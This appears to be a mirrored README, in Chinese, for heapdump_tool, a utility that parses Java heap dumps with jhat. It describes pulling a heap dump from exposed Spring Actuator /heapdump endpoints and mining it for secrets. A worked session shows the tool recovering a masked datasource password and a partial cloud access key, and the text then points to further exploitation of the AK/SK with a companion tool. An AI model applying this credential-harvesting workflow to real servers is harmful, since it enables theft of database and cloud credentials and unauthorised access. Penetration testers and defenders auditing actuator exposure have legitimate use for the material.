Giter Club home page Giter Club logo

heapdump_tool's Introduction

heapdump_tool


该工具是基于jhat,通过jhat解析heapdump文件,所以需要安装jdk和配置好环境变量,例如win \Java\jdk8\bin\jhat.exe, 
在控制台输入jhat检查是否安装正确。

usage:> java -jar heapdump_tool.jar  heapdump
查询方式:
1. 关键词    例如 password, accesskey 
2. 字符长度   len=10    获取长度为10的所有key或者value值
3. 按顺序获取  num=1-100 获取顺序1-100的字符
获取url,file,ip
geturl
getfile
getip
默认不输出查询结果非key-value格式的数据,需要获取所有值,输入all=true,all=false取消显示所有值。

----------------------------------------------------

常见的heapdump泄露,大多都是spring heapdump泄露

这里 以spring heapdump泄露 为例

访问 /env 或 /actuator/env 接口时,spring actuator 会将一些带有敏感关键词 (如 password、secret) 的属性名对应的属性值用 ****** 号替换,以达到脱敏的效果。

这时候就可以利用 该 工具来获取 /heapdump 或 /actuator/heapdump 接口下载的 jvm heap 信息,查找密码或AK(accessKey)等敏感信息。


访问 /actuator/env  得到部分信息如下

properties: {
spring.datasource.driver-class-name: {
value: "com.mysql.cj.jdbc.Driver",
origin: "URL [file:/home/test/deploy/config/application-pressure.yml]:3:24"
},
spring.datasource.url: {
value: "jdbc:mysql://test.mysql.rds.aliyuncs.com:3306/test?useUnicode=true&characterEncoding=utf-8&useTimezone=true&serverTimezone=GMT%2B8",
origin: "URL [file:/home/test/deploy/config/application-pressure.yml]:4:10"
},
spring.datasource.username: {
value: "root",
origin: "URL [file:/home/test/deploy/config/application-pressure.yml]:5:15"
},
spring.datasource.password: {
value: "******",
origin: "URL [file:/home/test/deploy/config/application-pressure.yml]:6:15"
},


获取 spring.datasource.password ,页面返回内容为 *******

下载 heapdump 文件, 然后使用工具
root@wy:~# 
> java -jar heapdump_tool.jar  heapdump.6
[-] file: heapdump.6
[-] Start jhat, waiting...
[-] get objects,waiting(1-2min)...
[-] fing object count: 113128
[-] please input keyword value to search, example: accesskey,len=16,num=0-10,all=true input q/quit to quit.
> spring.datasource.password
[-] Start find keyword: spring.datasource.password
>> spring.datasource.password -> test@wyzxxz 
[-] please input keyword value to search, example: accesskey,len=16,num=0-10,all=true input q/quit to quit.
> accesskey
[-] Start find keyword: accessKey
>> ConnectionProperties.noAccessToProcedureBodies -> When determining procedure parameter types for CallableStatements, and the connected user can''t access procedure bodies through "SHOW CREATE PROCEDURE" or select on mysql.proc should the driver instead create basic metadata
>> accessKey -> LTA**************
[-] please input keyword value to search, example: accesskey,len=16,num=0-10,all=true input q/quit to quit.
> q
[-] exit.


拿到ak sk后,可以结合 aksk_tool,进一步利用

heapdump_tool's People

Contributors

wyzxxz avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.